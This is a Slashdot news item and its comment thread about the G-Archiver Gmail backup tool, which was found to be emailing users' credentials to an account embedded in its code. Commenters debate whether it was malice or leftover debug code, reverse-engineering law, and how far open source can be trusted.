Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

G-Archiver Harvesting Google Mail Passwords

kdawson posted more than 6 years ago | from the change-password-now dept.

Security 462

Thwomp writes "It appears that a popular Gmail backup utility, G-Archiver, has been harvesting users' Gmail passwords. This was discovered when a developer named Dustin Brooks took a look at the code using a decompiler. He discovered a Gmail account name and password embedded in the source code. Brooks logged in and found over 1,700 emails all with user account information — with his own at the top. According to a story in Informationweek, he deleted the emails, changed the account password, and notified Google. The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in the product."

cancel ×

462 comments

This is why I backup my Gmail with G-Archiver (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719340)

Oh, wait...

Re:This is why I backup my Gmail with G-Archiver (1)

Brian Gordon (987471) | more than 6 years ago | (#22719398)

I've always thought those tools looked shady. Come on people, amazon s3 is not that expensive. Pony up.

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

afidel (530433) | more than 6 years ago | (#22719474)

Or simply use IMAP to archive your gmail account...

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

MBGMorden (803437) | more than 6 years ago | (#22719768)

You still have to trust the IMAP client to not be logging your passwords. It all comes down to whether or not you trust where the software came from. Luckily for open source projects there's an easy audit trail (so long as you compile from that source - a premade binary distributed with source could still contain malicious code simply not included in the provided source). For closed source software you're stuck trying arcane trickery like this guy did in order to find out when a program is spying on you.

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

Hatta (162192) | more than 6 years ago | (#22719950)

For closed source software you're stuck trying arcane trickery like this guy did in order to find out when a program is spying on you.

The upshot of this case is that the app in question was written with .Net which is fairly easy to decompile [aisto.com] . If he had chosen C++, there's a good chance no one would have bothered to pore over the assembly and find this out.

Re:This is why I backup my Gmail with G-Archiver (3, Insightful)

mmkkbb (816035) | more than 6 years ago | (#22720034)

Sure, but someone could have checked the net activity just as easily.

Re:This is why I backup my Gmail with G-Archiver (-1)

Atlantis-Rising (857278) | more than 6 years ago | (#22720014)

It's only 'easy' if your time has no value and you're competent to examine the source, which I would say the vast majority if not 99.9999% of people aren't.

Rather, you're much better off running a strong firewall that's not the same piece of software or hardware at the boundary of your network which will pick up on nasty things you haven't asked to be run; alternatively, you can run a packet sniffer and keep an eye on what the software is sending across the network (and unless the software has got a built-in ansible, that should be good enough for almost all applications.)

Re:This is why I backup my Gmail with G-Archiver (1)

maxume (22995) | more than 6 years ago | (#22719530)

G-Archiver works in the other direction. The idea is to back up your Gmail account, not to back up to your Gmail account.

Seriously, (1)

an.echte.trilingue (1063180) | more than 6 years ago | (#22719882)

Seriously, though, this is why I use the greasemonkey extension [mozilla.org] for firefox to do things like this. It allows you to add your own javascript to certain web pages. For example, the better gmail [mozilla.org] set of scripts provides a variety of enhancements, and there is a tool that lets you add a bcc to every mail (which is how I back up my sent mail).

The best part is that all the scripts are javascript, so even if you have the most rudimentary understanding of just about any programming language, you can easily figure out what the scripts are doing. No decompiling or reverse engineering needed.

Although I risk sounding like an ideologue for saying this, this once again shows how open source programs are inherently more secure than closed source.

Debug, Sure (5, Insightful)

Archangel Michael (180766) | more than 6 years ago | (#22719356)

"The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in [CC] the product."

Right. And I have a bridge I'd like to sell you too.

Re:Debug, Sure (5, Funny)

tristian_was_here (865394) | more than 6 years ago | (#22719482)

I did something similar I once picked up the wrong keys yet when I went to take them back to the person I decided to let myself in and accidentally walked out with a new TV.

Re:Debug, Sure (2, Interesting)

OptimusPaul (940627) | more than 6 years ago | (#22719590)

I actually did something like that accidentally. I enabled debug logging on a server and later noticed that it was logging usernames and passwords for all users on the system. It wasn't my code that was logging the names and it took me a week to find where it was being done and disable it.

Re:Debug, Sure... Around 1999 I found this out (4, Interesting)

davidsyes (765062) | more than 6 years ago | (#22720004)

by using a protocol analyzer to recover my OWN login and password for my side of the company's intranet. Turned out that the web software we used (can't remember the name, but it was not front phage, but it was indeed popular at the time) was harvesting or retaining ALL USER ACCOUNTS names and passwords. I became scared shitless because I was not sure how IT would feel. But I was former IT in the company and felt obligated to warn them that the vendor was conducting shitty coding processes and put not only OUR company at risk but other companies as well. If they had any diagnostic or call-home code in their web site building software, then potentially a corrupt employee in their company could gain some limited or full access to many companies' intranets if they gained physical access to the building. And, we all know about piggy-backing, where thieves waltzed in behind other employees, then proceeded to lift laptops, purses, keys, wallets, documents, whatever they could steal.

DAMN, I wish I could recall the name. I may ..

Here we go... I'm PRETTY damned sure it was NetObjects Fusion. Just googled "Year 1999 web building applications intranet web" and they were at the top of the list... I preferred it over front phage, but...

And, now that I Google "Year 1999 protocol analyzer sniffer packet" it seems to refresh my memory that I am PRETTY sure Sniffer Basic was the tool I used.

Of course, after that I never used any such tool on the LAN. But, being formerly in the IT department, and knowing what to look out for to help the company probably kept me out of trouble.

Re:Debug, Sure (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719580)

Right. And I have a bridge I'd like to sell you too.

Why do you feel the need to hurt the reputation and business of us legitimate bridge sellers?!?

Re:Debug, Sure (1)

Brian Gordon (987471) | more than 6 years ago | (#22719774)

Snake oil has legitimate medical uses!

Re:Debug, Sure (2, Funny)

countSudoku() (1047544) | more than 6 years ago | (#22719878)

And if he had nothing to hide, why was he trying to protect his password? People who use passwords are trying to hide something. I say leave open your accounts just in case the FBI or CIA need to check to make sure you're not a terroristo!!1!

Re:Debug, Sure (1)

Trillan (597339) | more than 6 years ago | (#22719758)

Is it a bridge between my IMAP server and teh interwebs? If so, oh boy oh boy, how much?!?

A-ha! (3, Interesting)

ccguy (1116865) | more than 6 years ago | (#22719388)

Maybe _this_ is why I'm getting more spam in my gmail account lately?
If it isn't, surely someone had a boner after reading the article and is coding as we speak...

Re:A-ha! (5, Funny)

Roofus (15591) | more than 6 years ago | (#22719714)

Yeah, I was logged into your account and noticed that too....very strange!

Re:A-ha! (0, Offtopic)

Dr. Eggman (932300) | more than 6 years ago | (#22719860)

Nah, I have G-mail but don't use G-Archiver and I've seen an upsurge in spam too. I think it has to do with Google Captcha cracked [slashdot.org] recently. Mass mailing from gmail to gmail might be trusted more? I don't know, I'm not to strong in that area...

That doesn't make sense. (5, Insightful)

RandoX (828285) | more than 6 years ago | (#22719406)

If you're debugging, you already have the account details. What possible reason could you have to email them to yourself?

Re:That doesn't make sense. (2, Interesting)

Galactic Dominator (944134) | more than 6 years ago | (#22719742)

Not if you're debugging the authentication process. I don't know the particulars of this project, but it's a least conceivable a hash wasn't processed correctly, or some other auth error. I don't that this was some oversight however.

Plausible but unlikely.

Re:That doesn't make sense. (1)

Anonymous Coward | more than 6 years ago | (#22719762)

What I don't get is how a 'popular' tool only has ~1750 users. Different definition of popular?

Hmmm (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719410)

he deleted the emails
But did he make a backup first?

Re:Hmmm (5, Insightful)

jeepee (607566) | more than 6 years ago | (#22720024)

he deleted the emails
But did he make a backup first?

He tried but it caused an infinite loop.

Trust me, trust me not. (2, Interesting)

bruce_the_loon (856617) | more than 6 years ago | (#22719416)

Trust me, trust me not, trust me, trust me not.

Oh damn, there goes my password.

Do you believe the developer? What debug code needs to send an email containing user account information?

Re:Trust me, trust me not. (4, Insightful)

Z00L00K (682162) | more than 6 years ago | (#22719642)

I don't believe that for a moment.

This seems to be a clear case of privacy invasion and unauthorized access to private data. And I think that this should have been brought to the attention of the police for further investigation.

In this case the guilty will have time to cover his tracks and hide.

Try this approach the next time you see something as grave as this. The worst thing that can happen if you report it is that the case gets dismissed.

DMCA (5, Insightful)

yohaas (228469) | more than 6 years ago | (#22719424)

If this was a big company, they would have denied it and gone after him under the DMCA. At least the admitted to something and pulled to product.

Re:DMCA (1)

Lao-Tzu (12740) | more than 6 years ago | (#22719734)

What does copyright have to do with this?

Re:DMCA (1)

Arthur B. (806360) | more than 6 years ago | (#22719814)

The software is copyrighted, duh.

Re:DMCA (2, Insightful)

yohaas (228469) | more than 6 years ago | (#22719872)

He reversed engineered the program, that would probably be banned under the DMCA. http://www.chillingeffects.org/reverse/ [chillingeffects.org]

Even the courts aren't this daft (4, Insightful)

MikeRT (947531) | more than 6 years ago | (#22719426)

You don't have to work in IT to know that there is no reason for G-Archiver to send the password to anyone but Google. This guy deserves to be prosecuted under anti-hacking statutes.

Re:Even the courts aren't this daft (5, Funny)

WPIDalamar (122110) | more than 6 years ago | (#22719476)

It only did send them to Gmail :)

Re:Even the courts aren't this daft (1)

Dionysus (12737) | more than 6 years ago | (#22719544)

You don't have to work in IT to know that there is no reason for G-Archiver to send the password to anyone but Google.

Why would the program need to send the password to anyone at all? It's an email archiver. All it needs to do is log in and pull the email. No need to mail the username/password combination at all.

Re:Even the courts aren't this daft (1)

MoonBuggy (611105) | more than 6 years ago | (#22719954)

Send as in transmit, not as in email - you can't log in at all if the application doesn't pass on the username/password.

Re:Even the courts aren't this daft (5, Funny)

Zordak (123132) | more than 6 years ago | (#22719612)

This guy deserves to be prosecuted under anti-hacking statutes.
Exactly. I mean, he was using a debugger! Doesn't he know that violates the DMCA? No doubt he'll be hearing from the G-Archiver lawyers AND the DoJ soon. It's time to show this clown that, in America, we don't put up with these kinds of shenanigans. And somebody call the copyright lobby. This is exactly the story they've been looking for to justify increasing the penalties for violating copyright to capital punishment.

Re:Even the courts aren't this daft (-1, Redundant)

MBGMorden (803437) | more than 6 years ago | (#22719662)

I think by "this guy" he was referring to the author of G-Archiver, not the person who discovered the problem.

Re:Even the courts aren't this daft (2, Funny)

Zordak (123132) | more than 6 years ago | (#22719732)

Hmmm, maybe I should have used explicit sarcasm tags.

Re:Even the courts aren't this daft (0)

Anonymous Coward | more than 6 years ago | (#22719914)

Sarcasm is not a synonym for stupid.

Re:Even the courts aren't this daft (1)

Rhabarber (1020311) | more than 6 years ago | (#22719952)

I think parent was ment to be funny. Hm, i actually is. Stupid, I don't have mod points.

Re:Even the courts aren't this daft (4, Informative)

Z00L00K (682162) | more than 6 years ago | (#22719972)

I actually found a few links that should be useful in cases like this: Of course you may have your own national version of IT incident reporting.

So if we really want to avoid having the police hunt us for petty crimes of downloading files - give them something real. :-)

Nice move, but illegal? (4, Insightful)

RandoX (828285) | more than 6 years ago | (#22719446)

Good intentions and all, but I'm sure Mr. Brooks just opened himself up to "hacking" charges.

Re:Nice move, but illegal? (5, Insightful)

San-LC (1104027) | more than 6 years ago | (#22719652)

Possibly by some ridiculous interpretation of the law, Mr. Books was "hacking." However, he purchased the rights to use G-Archiver, and he did not recompile the program in a different way and label it his own. He used information that the program (to which he has the rights to use, unless otherwise stated in some bullsheet EULA) used, found out that this program acted like a Trojan virus and submitted private information to an individual's e-mail account, and subsequently removed his information and disallowed any new information to be read.

Granted, he probably shouldn't have deleted everything and changed the password (morally: yes, legally: no), so it's likely he may face charges because of this. That's our legal system, folks.

Caught (4, Funny)

Itninja (937614) | more than 6 years ago | (#22719450)

Looks like someone got caught with their pants down in the cookie jar. That's not nearly as hot as it sounds.

Re:Caught (1)

InvisblePinkUnicorn (1126837) | more than 6 years ago | (#22719522)

"caught with their pants down in the cookie jar"

How does that work? Are their pants down in(side) the cookie jar, or are they physically standing inside some freak monster cookie jar, with their pants down?

Re:Caught (1)

Sciros (986030) | more than 6 years ago | (#22719880)

It's probably more like "with their pants down" AND "in the cookie jar." Then it makes sense.

Re:Caught (1)

gEvil (beta) (945888) | more than 6 years ago | (#22719640)

Is that better or worse than being caught with your hands down your pants in the cookie jar?

Re:Caught (0)

Anonymous Coward | more than 6 years ago | (#22719712)

Looks like someone got caught with their pants down in the cookie jar.
Either you got the quote wrong...or you REALLY enjoy your cookies...

Re:Caught (1)

San-LC (1104027) | more than 6 years ago | (#22719740)

...well, the cookie I was going to have for lunch DID look appealing before reading that post.


I guess I will just have the cake instead. At least I know THAT won't be a lie.

Re:Caught (1)

gEvil (beta) (945888) | more than 6 years ago | (#22719806)

The cake is alive!

Re:Caught (1)

Shados (741919) | more than 6 years ago | (#22719810)

One thing that makes me wonder about it. Any half assed programmer knows that literals are easy to notice in an hex editor, or with a decompiler. If someone with an automatic decompiler was able to look at the output and find something suspecious, it means it really wasnt obfuscated or hidden really well... So the guy would have known he ran a high risk of getting caught.

I'm unfamiliar with the tool really, but I'd be guessing its not really aimed at the "Click Here for Free Smilies!!!" crowd...so that was a very poor move to do something this easily noticed...

So either way, its incompetence: either he mistakenly left debug code in, either he did the worse attempt at spyware in history.

Re:Caught (1)

Seiruu (808321) | more than 6 years ago | (#22719890)

I wouldn't call gaining the login information of 1,7k gmail accounts as 'the worse attempt at spyware in history'. As long as there are results, it may not be bad to play the fool. They can easily run away with an excuse going "look, it wasn't even hidden well, it was an honest mistake" excuse. I mean, they at least seem to have fooled you.

Emailing them to yourself? (1)

webword (82711) | more than 6 years ago | (#22719480)

...and if you email usernames and passwords to
yourself -- like many folks do -- man, you are
looking to get punished like this. This is
especially true if you use public terminals.

(I know, I know. Not the same thing. Still...)

Gmail Backups? (3, Interesting)

techpawn (969834) | more than 6 years ago | (#22719484)

You have 6.5 gig of space on redundant remote servers. What are you backing up? Perhaps I do not understand what this application does and who needs it...

Re:Gmail Backups? (2, Informative)

fyrie (604735) | more than 6 years ago | (#22719554)

It's useful in case your account get stolen, or if it ever gets deleted by accident (it's happened to gmail users before).

Re:Gmail Backups? (2, Insightful)

Tony Hoyle (11698) | more than 6 years ago | (#22719694)

Of course using this software virtually guarantees that your account *will* be stolen, because the author 'accidentally' kept a record of your username/password 'for backup purposes'.

Re:Gmail Backups? (1)

squeeze69 (756427) | more than 6 years ago | (#22719802)

And, simply using a pop3 or imap4 compliant program to download all of the mail? The contacts could be exported by hand.

Re:Gmail Backups? (4, Informative)

Arccot (1115809) | more than 6 years ago | (#22720010)

You have 6.5 gig of space on redundant remote servers. What are you backing up? Perhaps I do not understand what this application does and who needs it...
Gmail has been known to shut down down accounts without notice or any chance of reversal. It's prudent to have a copy of your own data at all times, no matter how secure you think someone else is storing it.

Never ascribe to malice (5, Insightful)

Pope (17780) | more than 6 years ago | (#22719502)

what can be explained by incompetance?

Although in this case, that's some serious incompetance going on!

Re:Never ascribe to malice (0)

Anonymous Coward | more than 6 years ago | (#22719572)

Never ascribe to poor spelling what can be explained by idiocy.

Come on... incompetance? Doesn't your web browser underscore the idiotically misspelled word?

Re:Never ascribe to malice (1)

cpu_fusion (705735) | more than 6 years ago | (#22719648)

> "Never ascribe to malice what can be explained by incompetence"

It could be incompetence in this case ... but that saying holds little wisdom, in my opinion.

There are plenty of competent, malicious criminals out there. In fact, some of them are called Politicians.

Re:Never ascribe to malice (1)

swordgeek (112599) | more than 6 years ago | (#22719704)

Occam's Razor trumps Hanlon's Razor.

Don't give out passwords (4, Insightful)

Todd Knarr (15451) | more than 6 years ago | (#22719528)

And this, children, is why you should never ever give the password to your account to someone else. Not even someone who claims to want to do something for you. Once you've given it to them, you have no control over what they do with it.

Re:Don't give out passwords (1)

mrzaph0d (25646) | more than 6 years ago | (#22719964)

that's why i always change my password when using utilities like these. although i'm going to stop using them cause they never work..

Almost Willing To Believe (2, Informative)

_bug_ (112702) | more than 6 years ago | (#22719532)

I'm almost willing to believe the G-Archive excuse that its debug code. From the screenshots posted online of the inbox (before it was deleted) I only see e-mails marked as unread. If the entire inbox is filled with unread e-mails then I'm willing to believe it was a throw-away e-mail account used for testing/debugging. Also this kind of "bug" seems really blatant and certainly headed for an easy discovery. I'd expect a more obfuscated means of transmitting the username and password, were one so inclined to bug the software.

However 1,777 seems a bit small for "popular software" if this represents every install since the bugged software was released. Furthermore, how does e-mailing a password to a random account help in debugging the software?

I'm almost willing to believe in human stupidity as the reason this happened, but not quite.

Re:Almost Willing To Believe (1)

Mongoose Disciple (722373) | more than 6 years ago | (#22719664)

I'm with you there. All developers have sent code to production unintentionally, and just reading the summary I thought to myself, I probably have made that kind of mistake before, maybe this is innocent.

It's reading the story and seeing all the details that makes it just not add up to me.

No reason to read the body of the emails... (1, Insightful)

Anonymous Coward | more than 6 years ago | (#22719680)

There was no reason to read the emails as the username and password skimmed are in the subject line.

Re:Almost Willing To Believe (1)

Translation Error (1176675) | more than 6 years ago | (#22719682)

The emails would still be marked unread in Gmail if they've been accessed via POP.

Re:Almost Willing To Believe (1)

despe666 (802244) | more than 6 years ago | (#22719738)

Of course they're all unread, all the info is right there in the subject line, I'm willing to bet the body of the message was empty.

Anyone with 2 bits of knowledge about programming knows that there are much easier ways to debug than this, like, I don't know, using a debugger?

Re:Almost Willing To Believe (1)

u38cg (607297) | more than 6 years ago | (#22719764)

"Select all conversations in inbox"

"Mark as unread"

Not too hard, though I'd agree that if this was deliberate, I would expect it to be a bit more obfuscated than that...

Re:Almost Willing To Believe (0)

Anonymous Coward | more than 6 years ago | (#22719782)

He could be using a POP3 client to download those messages and they would still be marked as unread.

It doesn't make any sense why you'd need anything like that for any sort of debugging purpose, but the garchiver site and the owner matemediainc.com (russmedia.com) doesn't look that bad, even if the are "SEO" consultants.

I'm leaning more towards it wasn't intended for malicious reasons, but they screwed up big time and will probably never sell another license of garchiver. I hope the "developers" name gets leaked somewhere, he deserves to never get another job coding ever again. Time for that no talent hack to get a job testing his mental abilities. I hear Burger King is always looking for someone to work cleanup crew.

That REALLY doesn't make sense (2, Interesting)

fph il quozientatore (971015) | more than 6 years ago | (#22719550)

Suppose you want to harvest all users' emails by simply mailing them to your own account. Why on h^Hearth do you need the password of this account to be written in the source code?

Re:That REALLY doesn't make sense (1)

peragrin (659227) | more than 6 years ago | (#22719710)

Because that was part of the test code. he hard coded in a sample g-archiver account username and password. Why it sent the username and password to a particular account is the better question.

Is this for or against Open Source? (1)

Seiruu (808321) | more than 6 years ago | (#22719570)

For: Everybody can check the source.

Against:
(1) But because most users/people generally are not qualified to do so, there is a significant risk of damage being done already by the time the qualified users/people do.
(2) IT quacks can cause such loopholes and there really aren't many, if any at all, people around to be accountable for it.

Sucky blow for OS.

Re:Is this for or against Open Source? (1)

sdsucks (1161899) | more than 6 years ago | (#22719876)

I'd say for open source... and I don't see how it can be against it. At the very least it's neutral IMO.

1) A third party usually looks at open source software, and if something like this was found then word would get around fast. It doesn't require everyone who uses the software to be able to look for these problems.
(For example, on lesser known open source software the company I work for uses, we almost always take a look at the source.)

2) Not sure what your point is... Are you saying a malicious employee may more easily put something like this into the software if it is OS? If so, well, most "IT quacks" in that position have many ways to achieve the same goals.

Just wondering... (5, Interesting)

Doodhwala (13342) | more than 6 years ago | (#22719576)


So why did the binary program also have the password for the gmail account? One would assume that the email address would have been enough. After all, sending someone email doesn't require their password.

Re:Just wondering... (1)

Shados (741919) | more than 6 years ago | (#22719618)

To do a lookup to see if the email was received. Common stuff when debugging email sending software.

Re:Just wondering... (1, Informative)

Anonymous Coward | more than 6 years ago | (#22719824)

Or, to ensure that it doesn't end up in any unfortunate sent items folders.

Re:Just wondering... (1)

SpaceLifeForm (228190) | more than 6 years ago | (#22719874)

If you are debugging, you could just login through a browser and check.

Re:Just wondering... (4, Informative)

karmaflux (148909) | more than 6 years ago | (#22719962)

GMail requires you to authenticate with their SMTP servers to send mail. His choices were to include the account password, implement his own SMTP server and build it into the program, or use an open SMTP server. That last will often get your mail dropped as spam. The second one would have been better-secured, but the guy was obviously dumb enough to include a phishing function in a backup program, so it's obvious why he went with option number one.

Re:Just wondering... (1)

sdsucks (1161899) | more than 6 years ago | (#22720026)

Possibly for some kind of SMTP authentication.

Good point against closed source software. (1)

sdsucks (1161899) | more than 6 years ago | (#22719594)

Just sayin'..

Also, I'd be very surprised if this wasn't intentional. Not likely "debug" code.

In perspective, this isn't much (1)

bugnuts (94678) | more than 6 years ago | (#22719608)

1700+ email accounts isn't much, considering the volume of gmail. And then those accounts would have to be able to be linked to something, if one were to try to exploit it.

I'm really surprised it's sub-2000. Goes to show not many people use it.

Since the password of the email account was changed, it couldn't upload any further data either.

Re:In perspective, this isn't much (1)

ionymous (1216224) | more than 6 years ago | (#22719908)

Actually, if you look at the screen shot of the account [codinghorror.com] there are repeated messages.

Maybe G-Archiver sent a message every time it was launched or something.

So there are probably far fewer than 1700 accounts affected.

Also, if I were the guy who found this, I would have changed the password, then emailed everyone from the account to let them know what had happened. I suppose google could restore the messages so THEY can inform the owners.

what was that dude's name (2, Interesting)

rice_burners_suck (243660) | more than 6 years ago | (#22719626)

how about that guy who modified the login program to give him a backdoor hard-coded password and username? then he modified the compiler to recognize when it was compiling login and automatically insert the code, and deleted that code from login so it wouldn't be apparent in a code review. then he modified the compiler to recognize when it was compiling itself, and insert the code to modify both itself and login, and then deleted that code from the compiler as well. now there ain't no code to do that in the source code no more, but it does it anyway. eh?

likely story (1)

steffens (1050246) | more than 6 years ago | (#22719636)

I'm supposed to believe that some coder was logging passwords by accident? Right, and i'm just writing code for an online store and I just happen to be keeping copies of all CC #'s on my personal computer, just for debugging.

(Evil Laugh) Debugging straight to the bank!

Backup???? (2, Insightful)

spectrokid (660550) | more than 6 years ago | (#22719654)

Isn't the whole freakin point of GMail that you don't have to backup?

One thing strikes me (1)

mattpointblank (936343) | more than 6 years ago | (#22719752)

It would have been nice if the dude who uncovered this had emailed those concerned to let them know their accounts have been potentially violated. I use Gmail for 2 primary addresses and would like to know if my name was amongst the 1700 there. Deleting them all was good work but informing them too would have been nice (and probably not too hard).

Many Laws Broken , No Ehics (0)

Anonymous Coward | more than 6 years ago | (#22719754)

I am having trouble deciding who is more 'at fault' or who 'broke more laws'.

1. Logging in and DELETING the information can be considered a Criminal Offence. (two seperate offences actually)

2. Changing the password, security question, etc, can be considered another one.

Who did the original email address belong to? Can it be traced to the author?

In other words, no due process of law, or even an attempt at contacting the author was made.

What we have here, is the typical IT person / programmer playing policeman, totally unacceptable.

No evidence of fradulent activity, no attempt to contact the author, nothing, typical programmer/IT mentality, taking the law into their own hands.

Very nice that they had the ACM 'Code of Ethics' on their web site, they breached just about every rule.

Too bad there isn't a responsible body that BOTH parties could be reported to. Engineers would lose their license over this. Lucky they are just simple programmers.

Re:Many Laws Broken , No Ehics (2, Insightful)

MightyYar (622222) | more than 6 years ago | (#22720020)

What twisted, warped world do you live in where it is unethical to stop a crime-in-progress?

Let me be the first to say: (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22719776)

FUCKING BOLLOCKS.

-:v:vv::vvv:::vvvv::::vvvvv::::vvvv:::vvv::vv:v:-

POP? (1)

Joao (155665) | more than 6 years ago | (#22719778)

Did they save a list of the accounts that had the password stolen? The scumba^k^k^k^k^k "programmer" could have already downloaded the messages via POP before the author changed the account's password.

Doesn't look malicious to me (5, Insightful)

Pogie (107471) | more than 6 years ago | (#22719828)

Maybe I'm getting old, but this seems like a pretty clear case of "oh crap, I'm an idiot", rather than "mwuahahah, my plan for global domination proceeds apace!". According to the posting on codinghorror, the guy who found the issue (Dustin Brooks) found that the creator, John Terry, of the G-Archiver software had left his own email information in the code. Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).

Either way, this just smacks to me of a novice developer doing something incredibly dumb, rather than incredibly malicious. If he actually wanted to just collect other people's account information, why leave his own in the source code? He could have just as easily forwarded the information to an anonymized email account, or simply an account for which the login information was not present in source.

Just my opinion, I reserve the right to be wrong.

Re:Doesn't look malicious to me (3, Insightful)

AdamTrace (255409) | more than 6 years ago | (#22719942)

I agree. There's a lot of high and mighty programmers here who are calling this guy "incompetent", but I'd be shocked if we haven't all accidentally sent debug code to production at some point or another.

It's either an honest mistake, or a REALLY poor hack attempt. Unless I've given further information, I'm inclined to think it was an honest mistake.

Adamn

Re:Doesn't look malicious to me (1)

Seiruu (808321) | more than 6 years ago | (#22720000)

John Terry, of the G-Archiver software had left his own email information in the code
Yes, because getting your own gmail account is so hard these days.

Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).
What is missing in the article is this guy checking whether that gmail account has been set to "auto forward incoming emails to x account while leaving a copy behind". In that case, he could simply read these e-mails from a dif email account with none the wiser.

Deleted the emails (4, Insightful)

gorre (519164) | more than 6 years ago | (#22719852)

From the Information Week article:

Brooks said he then deleted the presumably stolen account information, changed the password on the account, and notified Google.
[...]
Google's statement continues. "We are investigating this incident, the underlying activities of which violate Gmail Program Policies. We have suspended the suspect account, and are in the process of notifying the owners of those accounts whose passwords may have been compromised. It's unfortunate that fraudsters continue to use email for these purposes. We have phishing detection capabilities built into Gmail, so we were able to act quickly to limit the impact of this particular attack."
I have never read Google's Privacy Policy but am slightly concerned that they appear to be able to access emails after their deletion.

Re:Deleted the emails (1)

Adradis (1160201) | more than 6 years ago | (#22720032)

Doesn't necessarily have to be the email itself. Assuming the account is used solely for password dumps, they probably have a record somewhere of emails sent to the account, and perhaps the subject line?

This is why... (2, Interesting)

Thelasko (1196535) | more than 6 years ago | (#22719896)

I stopped using shareware and only use open source software. You never know what kind of crap the programmer might have stuck in there unless you can read the source yourself.

What a dumbass (1)

tangent3 (449222) | more than 6 years ago | (#22719996)

There are better ways to email someone's userid and password to yourself without giving away your own password.
Like SMTP.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...